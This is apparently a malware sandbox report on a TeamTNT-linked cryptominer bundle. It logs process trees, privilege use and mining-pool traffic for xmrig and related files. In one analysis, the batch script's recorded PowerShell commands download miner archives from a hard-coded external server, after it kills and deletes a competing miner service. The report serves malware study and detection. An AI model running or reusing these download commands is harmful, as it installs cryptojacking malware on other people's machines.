memory/704-55-0x0000000000000000-mapping.dmp

memory/1500-56-0x0000000000000000-mapping.dmp

memory/1640-57-0x0000000000000000-mapping.dmp

memory/856-58-0x0000000000000000-mapping.dmp

memory/636-59-0x0000000000000000-mapping.dmp

memory/1004-60-0x0000000000000000-mapping.dmp

memory/880-61-0x0000000000000000-mapping.dmp

memory/1368-62-0x0000000000000000-mapping.dmp

memory/740-63-0x0000000000000000-mapping.dmp

memory/1776-64-0x0000000000000000-mapping.dmp

memory/1616-65-0x0000000000000000-mapping.dmp

memory/836-66-0x0000000000000000-mapping.dmp

memory/1564-67-0x0000000000000000-mapping.dmp

memory/1564-68-0x000007FEFB561000-0x000007FEFB563000-memory.dmp

memory/1564-69-0x000007FEF1DF0000-0x000007FEF294D000-memory.dmp

memory/1564-70-0x00000000024F0000-0x00000000024F2000-memory.dmp

memory/1564-71-0x00000000024F2000-0x00000000024F4000-memory.dmp

memory/1564-72-0x00000000024F4000-0x00000000024F7000-memory.dmp

memory/2044-73-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 0ef13bd9283ba54cbc47d9baf4601d6d
SHA1 ede1ee9091274f021c8725fbbc376c6d532d6aca
SHA256 8e2dfa485ac3c31e0c7b3c5254d38376a6e8b8d3ad3f8fa9aad9de9095472929
SHA512 42b0b2386012b29f13b7466c1e6289784f6031d251d048eabb4f84a1dee5c0f917ca452db94c51815100a349bf085ecdc379d0314576631409f31550cb141f27

memory/2044-78-0x00000000020D0000-0x00000000020D2000-memory.dmp

memory/2044-76-0x000007FEF1DF0000-0x000007FEF294D000-memory.dmp

memory/1564-77-0x00000000024FB000-0x000000000251A000-memory.dmp

memory/2044-80-0x00000000020D4000-0x00000000020D7000-memory.dmp

memory/2044-79-0x00000000020D2000-0x00000000020D4000-memory.dmp

memory/2044-81-0x00000000020DB000-0x00000000020FA000-memory.dmp

Analysis: behavioral16

Detonation Overview

Submitted

2021-10-29 19:08

Reported

2021-10-29 20:00

Platform

win10-en-20211014

Max time kernel

121s

Max time network

160s

Command Line

"C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\nssm\nssm.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\nssm\nssm.exe

"C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\nssm\nssm.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 time.windows.com udp
NL 20.101.57.9:123 time.windows.com udp

Files

N/A

Analysis: behavioral20

Detonation Overview

Submitted

2021-10-29 19:08

Reported

2021-10-29 20:00

Platform

win10-en-20210920

Max time kernel

122s

Max time network

154s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\start.cmd"

Signatures

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\start.cmd"

C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\xmrig.exe

xmrig.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 donate.v2.xmrig.com udp
NL 199.247.27.41:3333 donate.v2.xmrig.com tcp
US 8.8.8.8:53 time.windows.com udp
NL 20.101.57.9:123 time.windows.com udp

Files

memory/4336-115-0x0000000000000000-mapping.dmp

memory/4336-116-0x000001BE63E60000-0x000001BE63E80000-memory.dmp

memory/4336-117-0x000001BE63F80000-0x000001BE63FA0000-memory.dmp

memory/4336-118-0x000001BE63FB0000-0x000001BE63FD0000-memory.dmp

memory/4336-119-0x000001BE63FD0000-0x000001BE63FF0000-memory.dmp

Analysis: behavioral21

Detonation Overview

Submitted

2021-10-29 19:08

Reported

2021-10-29 20:00

Platform

win7-en-20210920

Max time kernel

117s

Max time network

160s

Command Line

"C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\xmrig.exe"

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\xmrig.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 donate.v2.xmrig.com udp
NL 199.247.27.41:3333 donate.v2.xmrig.com tcp

Files

memory/576-54-0x00000000000F0000-0x0000000000110000-memory.dmp

memory/576-55-0x0000000000390000-0x00000000003B0000-memory.dmp

memory/576-56-0x0000000000690000-0x00000000006B0000-memory.dmp

Analysis: behavioral9

Detonation Overview

Submitted

2021-10-29 19:08

Reported

2021-10-29 19:57

Platform

debian9-mipsbe-en-20211025

Max time kernel

0s

Command Line

[/tmp/198103836/payload.dat]

Signatures

N/A

Processes

/tmp/198103836/payload.dat

[/tmp/198103836/payload.dat]

Network

N/A

Files

N/A

Analysis: behavioral15

Detonation Overview

Submitted

2021-10-29 19:08

Reported

2021-10-29 20:00

Platform

win7-en-20211014

Max time kernel

118s

Max time network

130s

Command Line

"C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\nssm\nssm.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\nssm\nssm.exe

"C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\nssm\nssm.exe"

Network

N/A

Files

N/A

Analysis: behavioral8

Detonation Overview

Submitted

2021-10-29 19:08

Reported

2021-10-29 19:57

Platform

debian9-mipsel-en-20211025

Max time kernel

0s

Command Line

[/tmp/138283075/payload.dat]

Signatures

N/A

Processes

/tmp/138283075/payload.dat

[/tmp/138283075/payload.dat]

Network

N/A

Files

N/A

Analysis: behavioral24

Detonation Overview

Submitted

2021-10-29 19:08

Reported

2021-10-29 19:57

Platform

win10-en-20211014

Max time kernel

15s

Max time network

23s

Command Line

"C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\xmrig\WinRing0x64.sys.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\xmrig\WinRing0x64.sys.exe

"C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\xmrig\WinRing0x64.sys.exe"

Network

Country Destination Domain Proto
IE 52.109.76.32:443 tcp
US 8.8.8.8:53 time.windows.com udp
NL 40.119.148.38:123 time.windows.com udp

Files

N/A

Analysis: behavioral28

Detonation Overview

Submitted

2021-10-29 19:08

Reported

2021-10-29 19:57

Platform

ubuntu1804-amd64-en-20211025

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

N/A

Files

N/A

Analysis: behavioral17

Detonation Overview

Submitted

2021-10-29 19:08

Reported

2021-10-29 19:57

Platform

win7-en-20211014

Max time kernel

7s

Max time network

0s

Command Line

"C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\WinRing0x64.sys.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\WinRing0x64.sys.exe

"C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\WinRing0x64.sys.exe"

Network

N/A

Files

N/A

Analysis: behavioral22

Detonation Overview

Submitted

2021-10-29 19:08

Reported

2021-10-29 20:00

Platform

win10-en-20211014

Max time kernel

122s

Max time network

158s

Command Line

"C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\xmrig.exe"

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\xmrig.exe"

Network

Country Destination Domain Proto
IE 52.109.76.30:443 tcp
US 8.8.8.8:53 donate.v2.xmrig.com udp
NL 178.128.242.134:3333 donate.v2.xmrig.com tcp
US 8.8.8.8:53 time.windows.com udp
NL 20.101.57.9:123 time.windows.com udp

Files

memory/3960-118-0x000001D7A4710000-0x000001D7A4730000-memory.dmp

memory/3960-119-0x000001D7A4740000-0x000001D7A4760000-memory.dmp

memory/3960-121-0x000001D7A4790000-0x000001D7A47B0000-memory.dmp

memory/3960-120-0x000001D7A4770000-0x000001D7A4790000-memory.dmp

Analysis: behavioral23

Detonation Overview

Submitted

2021-10-29 19:08

Reported

2021-10-29 19:57

Platform

win7-en-20210920

Max time kernel

5s

Max time network

5s

Command Line

"C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\xmrig\WinRing0x64.sys.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\xmrig\WinRing0x64.sys.exe

"C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\xmrig\WinRing0x64.sys.exe"

Network

N/A

Files

N/A

Analysis: behavioral25

Detonation Overview

Submitted

2021-10-29 19:08

Reported

2021-10-29 20:00

Platform

win7-en-20210920

Max time kernel

118s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\xmrig\xmrig.exe"

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\xmrig\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\xmrig\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\xmrig\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\xmrig\xmrig.exe"

Network

N/A

Files

memory/832-54-0x00000000002E0000-0x0000000000300000-memory.dmp

memory/832-55-0x00000000003C0000-0x00000000003C4000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2021-10-29 19:08

Reported

2021-10-29 19:57

Platform

debian9-mipsbe-en-20211025

Max time kernel

0s

Command Line

[/tmp/147773066/payload.dat]

Signatures

N/A

Processes

/tmp/147773066/payload.dat

[/tmp/147773066/payload.dat]

Network

N/A

Files

N/A

Analysis: behavioral6

Detonation Overview

Submitted

2021-10-29 19:08

Reported

2021-10-29 19:57

Platform

ubuntu1804-amd64-en-20211025

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

N/A

Files

N/A

Analysis: behavioral7

Detonation Overview

Submitted

2021-10-29 19:08

Reported

2021-10-29 19:57

Platform

ubuntu1804-amd64-en-20211025

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

N/A

Files

N/A

Analysis: behavioral11

Detonation Overview

Submitted

2021-10-29 19:08

Reported

2021-10-29 20:00

Platform

win7-en-20211014

Max time kernel

119s

Max time network

125s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\init.bat"

Signatures

Stops running service(s)

evasion

Launches sc.exe

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 564 wrote to memory of 556 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 564 wrote to memory of 556 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 564 wrote to memory of 556 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 556 wrote to memory of 576 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 556 wrote to memory of 576 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 556 wrote to memory of 576 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 564 wrote to memory of 980 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\where.exe
PID 564 wrote to memory of 980 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\where.exe
PID 564 wrote to memory of 980 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\where.exe
PID 564 wrote to memory of 1756 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\where.exe
PID 564 wrote to memory of 1756 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\where.exe
PID 564 wrote to memory of 1756 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\where.exe
PID 564 wrote to memory of 932 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\where.exe
PID 564 wrote to memory of 932 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\where.exe
PID 564 wrote to memory of 932 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\where.exe
PID 564 wrote to memory of 1768 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\where.exe
PID 564 wrote to memory of 1768 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\where.exe
PID 564 wrote to memory of 1768 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\where.exe
PID 564 wrote to memory of 300 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 564 wrote to memory of 300 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 564 wrote to memory of 300 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 564 wrote to memory of 592 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\sc.exe
PID 564 wrote to memory of 592 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\sc.exe
PID 564 wrote to memory of 592 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\sc.exe
PID 564 wrote to memory of 1356 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\sc.exe
PID 564 wrote to memory of 1356 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\sc.exe
PID 564 wrote to memory of 1356 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\sc.exe
PID 564 wrote to memory of 836 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 564 wrote to memory of 836 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 564 wrote to memory of 836 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 564 wrote to memory of 1772 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 564 wrote to memory of 1772 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 564 wrote to memory of 1772 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 564 wrote to memory of 1752 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 564 wrote to memory of 1752 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 564 wrote to memory of 1752 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 564 wrote to memory of 1848 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 564 wrote to memory of 1848 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 564 wrote to memory of 1848 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\init.bat"

C:\Windows\system32\net.exe

net session

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Windows\system32\where.exe

where powershell

C:\Windows\system32\where.exe

where find

C:\Windows\system32\where.exe

where findstr

C:\Windows\system32\where.exe

where tasklist

C:\Windows\system32\timeout.exe

timeout 2

C:\Windows\system32\sc.exe

sc stop moneroocean_miner

C:\Windows\system32\sc.exe

sc delete moneroocean_miner

C:\Windows\system32\taskkill.exe

taskkill /f /t /im xmrig.exe

C:\Windows\system32\timeout.exe

timeout 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri 'http://85.214.149.236:443/sugarcrm/themes/default/images/SugarLogic/win/xmrig.zip' -OutFile 'C:\Users\Admin\xmrig.zip'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri 'http://85.214.149.236:443/sugarcrm/themes/default/images/SugarLogic/win/xmrig-6.13.1-msvc-win64.zip' -OutFile 'C:\Users\Admin\xmrig.zip'"

Network

N/A

Files

memory/556-55-0x0000000000000000-mapping.dmp

memory/576-56-0x0000000000000000-mapping.dmp

memory/980-57-0x0000000000000000-mapping.dmp

memory/1756-58-0x0000000000000000-mapping.dmp

memory/932-59-0x0000000000000000-mapping.dmp

memory/1768-60-0x0000000000000000-mapping.dmp

memory/300-61-0x0000000000000000-mapping.dmp

memory/592-62-0x0000000000000000-mapping.dmp

memory/1356-63-0x0000000000000000-mapping.dmp

memory/836-64-0x0000000000000000-mapping.dmp

memory/1772-65-0x0000000000000000-mapping.dmp

memory/1752-66-0x0000000000000000-mapping.dmp

memory/1752-67-0x000007FEFBD61000-0x000007FEFBD63000-memory.dmp

memory/1752-69-0x0000000002590000-0x0000000002592000-memory.dmp

memory/1752-70-0x0000000002592000-0x0000000002594000-memory.dmp

memory/1752-71-0x0000000002594000-0x0000000002597000-memory.dmp

memory/1752-68-0x000007FEF2780000-0x000007FEF32DD000-memory.dmp

memory/1752-72-0x000000000259B000-0x00000000025BA000-memory.dmp

memory/1848-73-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 79e4c0b77b8b96fda81ae95dfd4ec654
SHA1 0c5c5d2367b1c05c1b3993cef2b1056461df04a1
SHA256 2b6e568f5e6f02d719fdb9a2d2cb2ba56edaaedee44cf3fbe0be7cced67dbb59
SHA512 d7f1d7e3501208de6c2549cefd6348e2c4243f01240fba19d2df8ed553a2361d6ecea686679a4f510d81139bc63f52914d63b1fcbc7984d93de2f96539161330

memory/1848-76-0x000007FEF2780000-0x000007FEF32DD000-memory.dmp

memory/1848-78-0x0000000002632000-0x0000000002634000-memory.dmp

memory/1848-79-0x0000000002634000-0x0000000002637000-memory.dmp

memory/1848-77-0x0000000002630000-0x0000000002632000-memory.dmp

memory/1848-80-0x000000000263B000-0x000000000265A000-memory.dmp

Analysis: behavioral27

Detonation Overview

Submitted

2021-10-29 19:08

Reported

2021-10-29 19:57

Platform

ubuntu1804-amd64-en-20211025

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

N/A

Files

N/A